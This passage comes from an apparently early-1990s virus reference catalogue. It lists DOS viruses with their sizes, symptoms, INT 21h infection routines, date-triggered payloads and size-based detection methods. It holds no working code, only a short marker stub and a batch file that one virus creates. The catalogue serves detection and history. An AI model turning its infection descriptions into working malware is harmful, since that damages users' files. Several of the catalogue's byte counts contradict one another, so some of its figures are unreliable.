  6235.  
  6236. Symptoms: None.
  6237.  
  6238. Executing Procedure: Virus does not contain any damage routine,
  6239. but its spreading mechanism presents a great danger to the
  6240. infected file. The beginning is saved outside the file in free
  6241. space in the allocated cluster.  When copying such a program,
  6242. this part is not copied together with the rest of the file,
  6243. causing the original program to be destroyed.
  6244.  
  6245. Other manifested problems to files are: when an infected file is
  6246. read with the virus already in the memory, it tests as a virus
  6247. flag only the time of the last modification (62 seconds) and not
  6248. the actual file content.  The same virus flag is used by viruses
  6249. 648 and 1560 and some users have their programs immunized"
  6250. against virus 648.  The result is that, the nonsense data which
  6251. lies at the end of an infected file will be read rather than the
  6252. actual file content.
  6253.  
  6254. [744]
  6255. Virus Name: 744
  6256. Virus Type: Parasitic Virus
  6257. Virus Length: 744 bytes
  6258.  
  6259. Symptoms: Increases infected file sizes by 744 bytes. Destroyed
  6260. programs will cause computer to crash in most cases.
  6261.  
  6262. Damage: With the probability of 1:7 the virus will not infect
  6263. other files but will destroy the founded file.  Virus writes the
  6264. instruction JMP [BP+0] at the start of program. Virus contains an
  6265. error . It should write JMP F000:FFF0 instruction (computer
  6266. reboot - same as virus 648), which is 4 bytes from the actually
  6267. written instruction. Length of destroyed program is not changed.
  6268. This program contains a virus flag. Reads & writes using DOS
  6269. interrupts.  When virus finds a program which can be infected, it
  6270. reads and without any change writes to sector number  1 (FAT
  6271. area).  This is not done on the disk C:. It is done as a test
  6272. whether the disk is write protected or not.
  6273.  
  6274. [1800]
  6275. Virus Name: 1800
  6276. Other Names: Bulgarian virus, Sofia virus, Dark Avenger Virus
  6277. Type: Parasitic Virus
  6278. Virus Length: cca 1800 bytes
  6279.  
  6280. Symptoms: Increases infected file sizes by cca 1800 bytes (in the
  6281. case of EXE files it performs paragraph alignment).  Decreases
  6282. size of free RAM memory. Infected files contain the following
  6283. strings:
  6284.  
  6285.     "Eddie lives...somewhere in time!", "Diana P." a "This
  6286.      program was written in the city of Sofia (C) 1988-89 Dark
  6287.      Avenger".
  6288.  
  6289. Damage: Virus reads boot sector of the disk, and in it (offset
  6290. 10, OEM decimal version) marks the number of programs, which are
  6291. run from the given disk MOD 16.  If it is zero (after every 16
  6292. programs!!), it overwrites random cluster on the disk with part
  6293. of its own code.  The cluster number is then stored in the boot
  6294. sector at the position at offset 8 (OEM main version). Modifies
  6295. boot sector then writes back on the disk.
  6296.  
  6297. [V2000]
  6298. Virus Name: V2000
  6299. Other Names: 21 century virus
  6300. Virus Type: Parasitic Virus
  6301. Virus Length: 2000 bytes
  6302.  
  6303. Symptoms: Increases infected .COM and .EXE file sizes by 2000
  6304. bytes. Decreases size of free RAM memory by 4KB.  Infected files
  6305. contain the following strings:
  6306.  
  6307.     "(C) 1989 by Vesselin Bontchev".
  6308.  
  6309. Damage: No damage.
  6310.  
  6311. [2343]
  6312. Virus Name: 2343
  6313. Other Names: Flip virus
  6314. Virus Type: Multi-partite Virus
  6315. Virus Length: 2343 bytes
  6316.  
  6317. Symptoms: Increases infected .COM and .EXE file sizes by 2343
  6318. bytes.  Decreases size of free RAM memory with 2864 bytes.  New
  6319. DOS function 0FE01h is implemented, when virus is active in
  6320. memory, it returns 01FEh in AX.  Word  028h in DPT sector
  6321. contains the value 0FE01h.  Flip virus has the same virus flag as
  6322. the viruses 648, 1560 (ALABAMA) and 512: it sets the number of
  6323. seconds in the file's time stamp to the nonsense value of 62.
  6324. Infected files contain the following strings:
  6325.  
  6326.     "OMICRON by PsychoBlast".
  6327.  
  6328. Damage: Under certain conditions virus "flips" the screen. If the
  6329. damage routine is active, virus contains bit reversed of screen
  6330. font 8*14 and monitors the interrupt 10h. When video mode is
  6331. changed to the mode 2 or 3 the special routine for interrupt 1Ch
  6332. is activated. All other video modes are interrupt vector 1Ch  set
  6333. to IRET instruction.  For video modes 2 and 3, the video start
  6334. address is set to 1000h.  The memory at segment 0BA00h is used as
  6335. video memory rather than 0B800h.  On every call of interrupt 1Ch
  6336. (18.2 times per second) virus copies 500 words (characters and
  6337. their attributes) from memory segment 0B800h into memory segment
  6338. 0BA00h with inversion of rows & columns.
  6339.  
  6340. [Pojer]
  6341. Virus Name: Pojer
  6342. Virus Type: Parasitic Virus.
  6343. Virus Length: Infected EXE and COM files increase by 1919 Bytes.
  6344.  
  6345. PC Vectors Hooked: INT 21h and INT 24h
  6346.  
  6347. Executing Procedure:
  6348. 1) Checks whether it already resides in memory. If not, hooks INT
  6349.    21h and resides in the highest memory, and then executes the
  6350.    host program.
  6351. 2) If it already resides in the highest memory, the host program
  6352.    will be executed immediately
  6353.  
  6354. Infecting Procedure:
  6355. 1) The virus infects files by AH=4B in INT 21h. The uninfected
  6356.    files will be infected when they are executed.
  6357. 2) Before infecting files Pojer will hook INT 24h in order to
  6358.    ignore the I/O errors.
  6359.  
  6360. Damage:  None
  6361.  
  6362. Detecting Method:  Detectable if  the lengths of files increase
  6363. by 1919 Bytes.
  6364.  
  6365. [Drop]
  6366. Virus Name: Drop
  6367. Virus. Type: Parasitic Virus.
  6368. Virus Length: Infected EXE file sizes increase by 1130-1155
  6369.               Bytes and COM files increase by 1131 Bytes.
  6370.  
  6371. PC Vectors Hooked:  INT 21h
  6372.  
  6373. Executing Procedure:
  6374. 1) Checks whether it resides in memory or not. If not, hooks INT
  6375.    21h and resides in the highest memory, and then executes the
  6376.    host program (If it already resides in the highest memory, the
  6377.    host program will be executed directly).
  6378. 2) Then checks system date.  It will hook INT 21h if the date is
  6379.    "the sixth day of the month". The characters on the screen
  6380.    will drop and the system will hang when any program is
  6381.    executed.
  6382.  
  6383. Infecting Procedure:
  6384. 1) The virus infects files by AH=4B in INT 21h. The non-infected
  6385.    files will be infected  when they are executed.
  6386. 2) Before infecting files Drop will not hook INT 24h. The error
  6387.    information will appear when I/O errors occur.
  6388.  
  6389. Damage:  Refer to Executing Procedure 2).
  6390.  
  6391. Detecting Method:  Detectable if  the lengths of files   increase
  6392. by 1130-1155 Bytes.
  6393.  
  6394. [Ha]
  6395. Virus Name: Ha
  6396. Virus Type: Parasitic Virus.
  6397. Virus Length: Infected EXE file sizes increase by 1458-1468 Bytes
  6398.               and COM files increase by 1462 Bytes.
  6399.  
  6400. PC Vectors Hooked:  INT 21h
  6401.  
  6402. Executing procedure:
  6403. 1) Detects whether it has resided in memory.  If not, hooks INT
  6404.    21h and resides in the highest memory, and then executes the
  6405.    host program.
  6406. 2) If it has already resided in the highest memory, the program
  6407.    will be executed directly. Infecting Procedure:  The virus
  6408.    infects files by AH=4B in INT 21h.  The uninfected files
  6409.    will be infected when they are executed.
  6410.  
  6411. Damage:  None
  6412.  
  6413. Detecting Method: Detectable if the lengths of files increase by
  6414. 1458-1468 Bytes.
  6415.  
  6416. [LCT]
  6417. Virus Name: Lct
  6418. Virus Type: Parasitic Virus
  6419. Virus Length: Infected COM file sizes increase by 599 Bytes .
  6420.  
  6421. PC Vectors Hooked: None
  6422.  
  6423. Executing Procedure:
  6424. 1) Searches for a COM files in the current directory.
  6425. 2) The virus checks  whether the file is infected or not.  If the
  6426.    file has been infected, the virus continues to search until  an
  6427.    uninfected file is found and  then infects it.  The virus
  6428.    stops searching until the last COM file in the current
  6429.    directory is infected.
  6430.  
  6431. Damage: The virus checks the system date. If the date is "the
  6432. 25th of Dec.", every time when executing the infected files, only
  6433. the virus codes in the infected files are executed. The program then ends.
  6434. The host programs are not executed.
  6435.  
  6436. Detecting Method:  Detectable if the lengths of files increase
  6437. by 599 Bytes.
  6438.  
  6439. Remarks:
  6440. 1) Non memory resident.
  6441. 2) When infecting files, the virus does not hook INT 24h.  And
  6442.    the error information appears when I/O errors occur.
  6443.  
  6444. [NPOX-Var]
  6445. Virus Name: Npox-var
  6446. Virus Type: Parasitic Virus
  6447. Virus Length: Infected COM file sizes increase by 1000 Bytes .
  6448.  
  6449. PC Vectors Hooked: None
  6450.  
  6451. Executing Procedure:
  6452. 1) The virus searches for a COM file in the current directory.
  6453. 2) The virus checks whether the file is infected. If the file has
  6454.    been infected, the virus continues to search until an
  6455.    uninfected file is found and then infects it. (The virus
  6456.    infects only one file each time.)
  6457.  
  6458. Damage: None
  6459.  
  6460. Detecting Method:  Detectable if the lengths of files increase by
  6461. 1000 Bytes.
  6462.  
  6463. Remarks:
  6464. 1) Non memory resident.
  6465. 2) When infecting files, the virus does not hook INT 24h.  And
  6466.    the error information appears when I/O errors occur.
  6467. 3) The beginning of the virus is:
  6468.     INC         BX
  6469.     PUSH        AX
  6470.     POP         AX
  6471.     DEC         BX
  6472.     JMP         XXXX
  6473.  
  6474. [Bur-560h]
  6475. Virus Name: Bur-560h
  6476. Virus Type: Parasitic Virus
  6477. Virus Length: Infected COM files do not increase (Does  not
  6478.               infect EXE files). PC Vectors Hooked: None
  6479.  
  6480. Executing Procedure:
  6481. 1) The virus searches for COM files through the current path.
  6482. 2) The virus checks whether the file is infected. If the file has
  6483.    been infected, the virus continues to search until an
  6484.    uninfected file is found and then infects it (It infects only
  6485.    one file each time).
  6486.  
  6487. Damage:
  6488. The virus infects the files by covering up the original files, so
  6489. the lengths of the files do not increase and the functions of the
  6490. original files can not be executed.
  6491.  
  6492. Remarks:
  6493. 1) Non memory resident.
  6494. 2) When infecting files, the virus does not hook INT 24h.  And
  6495.    the error information appears when I/O errors occur.
  6496.  
  6497. [Benoit]
  6498. Virus Name: Benoit
  6499. Virus Type: Parasitic Virus
  6500. Virus Length:  Infected COM file sizes increase by 1183 bytes
  6501.                (Does not infect EXE files).
  6502.  
  6503. PC Vectors Hooked:  INT 21h
  6504.  
  6505. Executing Procedure:
  6506. 1) after entering memory, it checks whether it resides in memory.
  6507.    If not, the virus hooks INT 21h and resides in the high memory
  6508.    and then runs the host program.
  6509. 2) If the virus already resides in memory, the host programs will
  6510.    be executed directly.
  6511.  
  6512. Infecting procedure:
  6513. 1) Infects the file by "AH=4B" in INT 21h. When an uninfected
  6514.    file is executed, it will be infected (Does not infect COM
  6515.    files).
  6516. 2) When infecting files, the virus does not hook INT 24h. The
  6517.    error information will appear when I/O errors occur.
  6518.  
  6519. Damage: None
  6520.  
  6521. Detecting method: Detectable when the lengths of files increase
  6522. by 1183 bytes.
  6523.  
  6524. [Hallo]
  6525. Virus Name: Hallo
  6526. Virus Type: Parasitic Virus
  6527. Virus Length: Infected COM file sizes increase by 496 Bytes.
  6528.               (Does not infect EXE files.)
  6529.  
  6530. PC Vectors Hooked: None
  6531.  
  6532. Executing Procedure:
  6533. 1) Searches for a COM file in the current disk.
  6534. 2) Checks whether the file is infected.  If yes, continues to
  6535.    search until an uninfected file is found and then infects it.
  6536.    (Infects only one file each time). After the file is infected,
  6537.    the virus displays
  6538.  
  6539.    "I have got a virus for you!".
  6540.  
  6541. Damage: None
  6542.  
  6543. Detecting Method:
  6544. See if the string "I have got a virus for you!" displays when
  6545. executing programs and if the lengths of files increase by 599
  6546. Bytes.
  6547.  
  6548. Remarks:
  6549. 1) Non memory resident.
  6550. 2) When infecting files, the virus does not hook INT 24h.  Error
  6551.    message will appear when I/O errors  occur.
  6552.  
  6553. [Allerbmu]
  6554. Virus Name: Allerbmu
  6555. Virus Type: Parasitic Virus
  6556. Virus Length: Infected COM file sizes increase by 359 Bytes.
  6557.               (Does not infect EXE files.)
  6558.  
  6559. PC Vectors Hooked: None
  6560.  
  6561. Executing Procedure:
  6562. 1) Searches for a COM file in the current directory.
  6563. 2) Checks whether the file is infected.  If yes, the virus
  6564.    continues to search.
  6565. 3) If an uninfected file is found, the virus will proceed to
  6566.    infect it. (The virus infects only one file each time).
  6567. 4) Checks the system date no matter whether an uninfected COM
  6568.    file is found or not.  When the date is 'Monday', virus
  6569.    destroys all the files on hard disk, and then displays the
  6570.    following message:
  6571.  
  6572.    "+ ALLERBMU NORI +(c) 1991........................"
  6573.  
  6574. Damage: Refer to Executing Procedure 4).
  6575.  
  6576. Detecting Method:  Detectable if the lengths of files increase by
  6577. 359 Bytes.
  6578.  
  6579. Remarks:
  6580. 1) Non memory resident.
  6581. 2) When infecting files, the virus does not hook INT 24h.  Error
  6582.    message will appear when I/O errors  occur.
  6583.  
  6584. [Findm-608]
  6585. Virus Name: Findm-608
  6586. Virus Type: Parasitic Virus
  6587. Virus Length: Infected COM file sizes increase by 608-623 Bytes.
  6588.               (Does not infect EXE files.)
  6589.  
  6590. PC Vectors Hooked: None
  6591.  
  6592. Executing Procedure:
  6593. 1) Searches for a COM file in the current directory.
  6594. 2) Checks whether the file is infected. If yes, continues to
  6595.    search ununtil an uninfected file is found.
  6596. 3) If an uninfected file is found, the virus will proceed to
  6597.    infect it.
  6598.  
  6599. Damage: None
  6600.  
  6601. Detecting Method:  Detectable if the lengths of files increase by
  6602. 608-623 Bytes.
  6603.  
  6604. Remarks:
  6605. 1) The part of infection of the virus was badly written.  Most
  6606.    of the infected files cannot be executed normally (also the
  6607.    virus is not able to infect and damage).
  6608. 2) Non memory resident.
  6609. 3) When infecting files, the virus does not hook INT 24h.  Error
  6610.    message will appear when I/O errors occur.
  6611.  
  6612. [ARCV-2]
  6613. Virus Name: Arcv-2
  6614. Virus Type: Parasitic Virus
  6615. Virus Length: Infected EXE file sizes increase by 693 Bytes
  6616.               (Does not infect COM files).
  6617.  
  6618. PC Vectors Hooked: INT 24h
  6619.  
  6620. Executing Procedure:
  6621. 1) Searches for an EXE file in the current directory.
  6622. 2) Checks whether the file is infected.  If yes, the virus
  6623.    continues to search.
  6624. 3) If an uninfected file is found, the virus will proceed to
  6625.    infect it (infects only one file each time).
  6626. 4) Whether an uninfected EXE file is found or not,
  6627.    the virus will check the system date.  When the date is
  6628.    "April" or "the sixth of the month", the virus will display
  6629.  
  6630.    "Help  ..  Help  ..  I'm Sinking ........"
  6631.  
  6632.    on the screen.
  6633.  
  6634. Damage: None
  6635.  
  6636. Detecting Method:  Detectable if the lengths of files increase by
  6637. 693 Bytes.
  6638.  
  6639. Remarks:
  6640. 1) The part of infection was badly written.  Most of the
  6641.    infected files cannot be executed normally (also the virus is
  6642.    not able to infect and damage).
  6643. 2) Non memory resident.
  6644. 3) When infecting files, the virus does not hook INT 24h.  Error
  6645.    message will appear when I/O errors occur.
  6646.  
  6647. [Hallo-759]
  6648. Virus Name: Hallo-759
  6649. Virus. Type: Parasitic Virus.
  6650. Virus Length: Infected COM file sizes increase by 533 bytes
  6651.               (Does not infect EXE files).
  6652.  
  6653. PC Vectors Hooked: None
  6654.  
  6655. Executing Procedure:
  6656. 1) Searches a COM file in the current directory.
  6657. 2) Checks whether the file is infected. If yes, continues to
  6658.    search until an uninfected file is found and then infects it.
  6659.    (infects only one file each time).  After infecting, the virus
  6660.    displays the string:
  6661.  
  6662.    "I have got a virus for you!".
  6663.  
  6664. Damage: None
  6665.  
  6666. Detecting Method:
  6667. Detectable when the string "I have got a virus for you!" is
  6668. displayed when executing  programs and if the lengths of files
  6669. increases by 759-775 Bytes.
  6670.  
  6671. Remarks:
  6672. 1) The infecting part was badly written.  After the infected
  6673.    files end, the system will hang.
  6674. 2) Non memory resident.
  6675. 3) When infecting files, the virus does not hook INT 24h.  Error
  6676.    message will appear when I/O errors occur.
  6677.  
  6678. [Atomic-2A]
  6679. Virus Name: Atomic-2a
  6680. Virus Type: Parasitic Virus
  6681. Virus Length: Infected COM file sizes increase by 350 Bytes
  6682.               (Does not infect EXE files).
  6683.  
  6684. PC Vectors Hooked: None
  6685.  
  6686. Executing Procedure:
  6687. 1) Searches for a COM file in the current directory.
  6688. 2) Checks whether the file is infected.  If yes, continues to
  6689.    search until an uninfected file is found and then infects it.
  6690.    (infects only one file each time.)
  6691.  
  6692. Damage: None
  6693.  
  6694. Detecting Method:  Detectable if the lengths of files increase by
  6695. 350 Bytes.
  6696.  
  6697. Remarks:
  6698. 1) Non memory resident.
  6699. 2) When infecting files, the virus does not hook INT 24h. Error
  6700.    message will appear when I/O errors occur.
  6701.  
  6702. [Atomic-1B]
  6703. Virus Name: Atomic-1b
  6704. Virus Type: Parasitic Virus
  6705. Virus Length:  The lengths of the infected COM files do not
  6706.                increase (Does not infect EXE files.)
  6707.  
  6708. PC Vectors Hooked: None
  6709.  
  6710. Executing Procedure:
  6711. 1) When the system date is the 1st, the virus will display
  6712.  
  6713.     "The Atomic Dustbin--YOUR PHUCKED!"
  6714.  
  6715.     and hang the system.
  6716. 2) When the system date is the 26th, the following message will
  6717.    be displayed before the system hangs:
  6718.  
  6719.    "The Atomic Dustbin 1B -- This is almost the second step !"
  6720.  
  6721. 3) When the system date is neither the 1st nor the 26th:
  6722.     i) Virus proceeds to search all COM files in the current
  6723.        directory;
  6724.    ii) checks whether the file is infected. If yes, continues to
  6725.        search;
  6726.   iii) if an uninfected file is found,  proceeds to infect it.
  6727.        (infects only two files each time).  After infecting,
  6728.        displays "Program execution terminated."
  6729.  
  6730. Damage: None
  6731.  
  6732. Detecting Method:
  6733. Detectable if the string "Program execution terminated" is
  6734. displayed when a  program is executed.
  6735.  
  6736. Remarks:
  6737. 1) Non memory resident.
  6738. 2) When infecting files, the virus does not hook INT 24h. Error
  6739.    message will appear when I/O errors occur.
  6740.  
  6741. [Atomic-1A]
  6742. Virus Name: Atomic-1A
  6743. Virus Type: Parasitic Virus
  6744. Virus Length:  The lengths of the infected COM files do not
  6745.                increase (Does not infect EXE files.)
  6746.  
  6747. PC Vectors Hooked: None
  6748.  
  6749. Executing Procedure:
  6750. 1) When the system date is the 25th, the virus displays the
  6751.    string "The Atomic Dustbin 1A -- This is almost the first step
  6752.    !" and hang the system.
  6753. 2) When the system date is not the 25th:
  6754.     i) it searches for a COM file in the current directory;
  6755.    ii) checks whether the file is infected. If yes, continues to
  6756.        search;
  6757.   iii) if an uninfected file is found, the virus will proceed to
  6758.        infect it (infects only two files each time).  After
  6759.        infecting, displays the string "Bad command or file name".
  6760.  
  6761. Damage: None
  6762.  
  6763. Detecting Method:
  6764. Detectable if the string "bad command or file name" is displayed
  6765. when a file is executed.
  6766.  
  6767. Remarks:
  6768. 1) Non memory resident.
  6769. 2) When infecting files, the virus does not hook INT 24h. Error
  6770.    message will appear when I/O errors occur.
  6771.  
  6772. [Arusiek]
  6773. Virus Name: Arusiek
  6774. Virus Type: Parasitic Virus.
  6775. Virus Length: Infected EXE and COM file sizes increase by 817
  6776.               bytes.
  6777.  
  6778. PC Vectors Hooked:  INT 21h and INT 24h
  6779.  
  6780. Executing Procedure:
  6781. 1) Checks whether it already resides in the memory.  If not, it
  6782.    hooks INT 21h and implants itself in memory, and then executes
  6783.    the host program.
  6784. 2) If it already resides in memory, the host program will be
  6785.    executed directly.
  6786.  
  6787. Infecting Procedure:
  6788. 1) Infects files by AH=4B in INT 21h. Uninfected files will be
  6789.    infected when they are executed.
  6790. 2) Before infecting files,  the virus will hook INT 24h in order
  6791.    to ignore I/O errors.
  6792.  
  6793. Damage:  None
  6794.  
  6795. Detecting Method:  Detectable if  the lengths of files   increase
  6796. by 817 bytes.
  6797.  
  6798. [Atas-3]
  6799. Virus Name: Atas-3
  6800. Virus Type: Parasitic Virus.
  6801. Virus Length: Infected EXE and COM file sizes increase by 1268
  6802.               bytes.
  6803.  
  6804. PC Vectors Hooked:  INT 21h and INT 24h
  6805.  
  6806. Executing Procedure:
  6807. 1) Checks whether it resides in the memory.  If not, hooks INT
  6808.    21h and implants itself in the memory, and then executes the
  6809.    host program.
  6810. 2) If it already resides in the memory, the host program will be
  6811.    executed directly.
  6812.  
  6813. Infecting Procedure:
  6814. 1) Infects files by AH=4B in INT 21h.  Uninfected files will be
  6815.    infected when they are executed.
  6816. 2) Before infecting files, the virus will hook INT 24h in order
  6817.    to ignore I/O errors.
  6818.  
  6819. Damage:  None
  6820.  
  6821. Detecting Method:  Detectable if  the lengths of files   increase
  6822. by 1268 bytes.
  6823.  
  6824. [ARCV-570]
  6825. Virus Name: Arcv-570
  6826. Virus Type: Parasitic Virus
  6827. Virus Length:  Infected EXE file sizes increase by 570-585 Bytes
  6828.                (Does not infect COM files.)
  6829.  
  6830. PC Vectors Hooked: None
  6831.  
  6832. Executing Procedure:
  6833. 1) Searches for an EXE file in the current directory.
  6834. 2) Checks whether the file is infected. If yes, continues to
  6835.    search until an uninfected file is found and then infects it
  6836.    (infects only one file each time).
  6837.  
  6838. Damage: None
  6839.  
  6840. Detecting Method: Detectable if the lengths of files increase by
  6841. 570-585 Bytes.
  6842.  
  6843. Remarks:
  6844. 1) Non memory resident.
  6845. 2) When infecting files, it does not hook INT 24h. Error message
  6846.    will appear when I/O errors occur.
  6847.  
  6848. [Atas-3215]
  6849. Virus Name: Atas-3215
  6850. Virus Type: Parasitic Virus.
  6851. Virus Length: About 3215 bytes (there are several variations.)
  6852.  
  6853. PC Vectors Hooked:  INT 21h
  6854.  
  6855. Executing Procedure: (The virus infects files only in DOS 3.3)
  6856. 1) Checks whether it resides in the memory.  If not, hooks INT
  6857.    21h and implants itself in the memory, and proceeds to execute
  6858.    the original program.
  6859. 2) If it already resides in the memory, the host program will be
  6860.    executed directly.
  6861.  
  6862. Infecting Procedure:
  6863. 1) Infects files by AH=4B in INT 21h.  Uninfected files will be
  6864.    infected when they are executed.
  6865.  
  6866. [Andromda]
  6867. Virus Name: Andromda
  6868. Virus Type: Parasitic Virus
  6869. Virus Length:  Infected COM file sizes increase by 1140 Bytes
  6870.                (Does not infect EXE files).
  6871.  
  6872. PC Vectors Hooked: None
  6873.  
  6874. Executing Procedure:
  6875. 1) Searches for a COM files in the current directory.
  6876. 2) Checks whether the file is infected.  If yes, continues to
  6877.    search ununtil an uninfected file is found.
  6878. 3) Then infects it (infects only two files each time.)
  6879.  
  6880. Damage: None
  6881.  
  6882. Detecting Method:  Detectable if the lengths of files increase by
  6883. 1140 Bytes.
  6884.  
  6885. Remarks:
  6886. 1) Non memory resident.
  6887. 2) When infecting files, the virus does not hook INT 24h. Error
  6888.    message will appear when I/O errors occur.
  6889.  
  6890. [Grunt-529]
  6891. Virus Name: Grunt-529
  6892. Virus Type: Parasitic Virus
  6893. Virus Length:  Infected COM file sizes increase by 529 Bytes
  6894.                (Does not infect EXE files).
  6895.  
  6896. PC Vectors Hooked: None
  6897.  
  6898. Executing Procedure:
  6899. 1) Searches for a COM file in the current directory.
  6900. 2) Checks whether the file is infected.  If yes, continues to
  6901.    search.
  6902. 3) If an uninfected file is found, infects it. (infects only one
  6903.    file each time.)
  6904. 4) Checks the system date no matter whether an uninfected COM
  6905.    file is found or not.  When the date is Friday and after the
  6906.    year of 1993, the virus displays the following information on
  6907.    the screen:
  6908.  
  6909.    "Nothing like the smell of napalm in the morning!"
  6910.  
  6911. Damage: None
  6912.  
  6913. Detecting Method:  Detectable if the lengths of files increase by
  6914. 529 Bytes.
  6915.  
  6916. Remarks:
  6917. 1) Non memory resident.
  6918. 2) When infecting files, the virus does not hook INT 24h.  Error
  6919.    message will appear when I/O errors  occur.
  6920.  
  6921. [Ein-Volk]
  6922. Virus Name: Ein-Volk
  6923. Virus Type: Parasitic Virus
  6924. Virus Length:  Infected COM file sizes increase by 482 Bytes
  6925.                (Does not infect EXE files.)
  6926.  
  6927. PC Vectors Hooked: None
  6928.  
  6929. Executing Procedure:
  6930. 1) Searches for a COM files in the current directory.
  6931. 2) Checks whether the file is infected.  If yes, continues to
  6932.    search.
  6933. 3) If an uninfected file is found, proceeds to infect it. Does
  6934.    not stop searching until all the COM files in the directory are
  6935.    infected.
  6936.  
  6937. Damage: None
  6938.  
  6939. Detecting Method:  Detectable if the lengths of files increase by
  6940. 482 Bytes.
  6941.  
  6942. Remarks:
  6943. 1) Non memory resident.
  6944. 2) When infecting files, the virus does not hook INT 24h. Error
  6945.    message will appear when I/O errors occur.
  6946.  
  6947. [DOS7]
  6948. Virus Name: Dos7
  6949. Virus Type: Parasitic Virus
  6950. Virus Length:  Infected COM file sizes increase by 342 Bytes
  6951.                (Does not infect EXE files).
  6952.  
  6953. PC Vectors Hooked: None
  6954.  
  6955. Executing Procedure:
  6956. 1) Searches for a COM file in the current directory.
  6957. 2) Checks whether the file is infected. If yes, it continues to
  6958.    search.
  6959. 3) If an uninfected file is found, the virus proceeds to infect
  6960.    it (Infects only one file each time).
  6961.  
  6962. Damage: None
  6963.  
  6964. Detecting Method:  Detectable if the lengths of files increase by
  6965. 342 Bytes.
  6966.  
  6967. Remarks:
  6968. 1) Non memory resident.
  6969. 2) When infecting files, the virus does not hook INT 24h. Error
  6970.    message will appear when I/O errors occur.
  6971.  
  6972. [Dooms-715]
  6973. Virus Name: Dooms-715
  6974. Virus Type: Parasitic Virus
  6975. Virus Length:  Infected COM file sizes increase by 715 Bytes
  6976.                (Does not infect EXE files).
  6977.  
  6978. PC Vectors Hooked: None
  6979.  
  6980. Executing Procedure:
  6981. 1) Searches for a COM file in the root directory.
  6982. 2) Checks whether the file is infected.    If yes, continues to
  6983.    search.
  6984. 3) If an uninfected file is found, infects it (infects only one
  6985.    file each time).
  6986.  
  6987. Damage: None
  6988.  
  6989. Detecting Method:  Detectable if the lengths of files increase by
  6990. 715 Bytes.
  6991.  
  6992. Remarks:
  6993. 1) Non memory resident.
  6994. 2) When infecting files, the virus does not hook INT 24h. Error
  6995.    message will appear when I/O errors occur.
  6996.  
  6997. [Dir-522]
  6998. Virus Name: Dir-522
  6999. Virus Type: Parasitic Virus.
  7000. Virus Length: Infected COM file sizes increase by 1268 bytes
  7001.               (Does not infect EXE files).
  7002.  
  7003. PC Vectors Hooked:  INT 21h and INT 24h
  7004.  
  7005. Executing Procedure:
  7006. 1) Checks whether it resides in memory.  If not, hooks INT 21h
  7007.    and implants itself in memory, and then executes the host
  7008.    program.
  7009. 2) If it already resides in memory, the host program will be
  7010.    executed directly.
  7011.  
  7012. Infecting Procedure:
  7013. 1) The virus infects files by "dir" command. When "dir" command
  7014.    is executed, the virus searches for an uninfected file and
  7015.    then infects it.
  7016. 2) Before infecting files, the virus hooks INT 24h in order to
  7017.    ignore the I/O errors.
  7018.  
  7019. Damage:  None
  7020.  
  7021. Detecting Method:  Detectable if  the lengths of files increase
  7022. by 522 bytes.
  7023.  
  7024. [Compan-83]
  7025. Virus Name: Compan-83
  7026. Virus Type: Parasitic Virus.
  7027. Virus Length:  83 bytes.
  7028.  
  7029. PC Vectors Hooked:  INT 21h
  7030.  
  7031. Executing Procedure:
  7032. 1) Checks whether it resides in memory. If not, hooks INT 21h and
  7033.    implants itself in memory, and then executes the host program.
  7034. 2) If it already resides in memory, the program will be executed
  7035.    directly.
  7036.  
  7037. Infecting Procedure:
  7038. 1) The virus infects files by AH=4B in INT 21h. When an infected
  7039.    EXE file is executed, the virus will create a COM file with a
  7040.    length of 83 bytes. The content of the COM file is the virus
  7041.    itself (hidden file).
  7042. 2) When infecting files, the virus does not hook INT 24h. Error
  7043.    message will appear when  I/O errors occur.
  7044.  
  7045. Damage:  None
  7046.  
  7047. Detecting Method:  Detectable if  the length of a file is 83
  7048. bytes.
  7049.  
  7050. [ChipShit]
  7051. Virus Name: Chipshit
  7052. Virus Type: Parasitic Virus.
  7053. Virus Length:  Infected COM file sizes increase by 877 bytes
  7054.                (Does not infect EXE files).
  7055.  
  7056. PC Vectors Hooked:  None
  7057.  
  7058. Executing Procedure:
  7059. 1) Checks the system date. When the date is later than Feb.
  7060.    11, 1993, the virus displays the following information on the
  7061.    screen:
  7062.  
  7063.     "Hej! Tu wirus chipshit! Co........"
  7064.  
  7065. 2)  When the date is before Feb. 11th ,1993,
  7066.     a) Searches for a COM file in the current directory.
  7067.     b) Checks whether the file is infected.  If yes, it continues to
  7068.        search.
  7069.     c) If an uninfected file is found, it proceeds to infect it
  7070.        (infects only one file each time).
  7071.  
  7072. Damage:  None
  7073.  
  7074. Detecting Method:  Detectable if the lengths of files increase by
  7075. 877 bytes.
  7076.  
  7077. Remarks:
  7078. 1) Non memory resident.
  7079. 2) When infecting files, the virus does not hook INT 24h. Error
  7080.    message will appear when I/O errors occur.
  7081.  
  7082. [Carbuncl]
  7083. Virus Name: Carbuncl
  7084. Virus Type: Parasitic Virus.
  7085. Virus Length:  622 bytes.
  7086.  
  7087. PC Vectors Hooked:  None
  7088.  
  7089. Executing Procedure:
  7090. 1) With a 5/6 chance probability:
  7091.    i) Searches for an EXE file in the current directory.
  7092.   ii) Renames the file name as *.crp, and then creates a  *.bat
  7093.       file with the following contents:
  7094.  
  7095.                    @ECHO OFF
  7096.                    CARBUNCL
  7097.                    RENAME JEXE.CRP JEXE.EXE
  7098.                    JEXE.EXE
  7099.                    RENAME JEXE.EXE JEXE.CRP
  7100.                    CARBBUNCL
  7101.  
  7102.       (JEXE.EXE is the infected file, and CARBUNCL is the virus)
  7103.  iii) Repeats above procedure until all the EXE files are
  7104.       infected.
  7105. 2) With a 1/6 chance probability:  Infects 5 *.CRP files.
  7106.  
  7107. Damage:  None
  7108.  
  7109. Detecting Method:  Detectable if  the lengths of files increase
  7110. by 877 bytes.
  7111.  
  7112. Remarks:
  7113. 1) Non memory resident.
  7114. 2) When infecting files, the virus does not hook INT 24h. Error
  7115.    message will appear  when I/O errors occur.
  7116.  
  7117. [VCL-2]
  7118. Virus Name: Vcl-2
  7119. Virus Type: Parasitic Virus.
  7120. Virus Length:  Infected COM file sizes increase by 663 bytes
  7121.                (Does not infect EXE files).
  7122.  
  7123. PC Vectors Hooked:  None
  7124.  
  7125. Executing Procedure:
  7126. 1) Searches for a COM file in the  current directory.
  7127. 2) Checks if the file is infected.  If yes, continues to search.
  7128. 3) If an uninfected file is found, it proceeds to infect it
  7129.    (infects only two files each time).
  7130.  
  7131. Damage:  None.
  7132.  
  7133. Detecting Method:  Detectable if  the files increase by 663 bytes
  7134.  
  7135. Remarks:
  7136. 1) Non memory resident.
  7137. 2) When infecting files, the virus does not hook INT 24h.  Error
  7138.    message will appear when I/O errors occur.
  7139.  
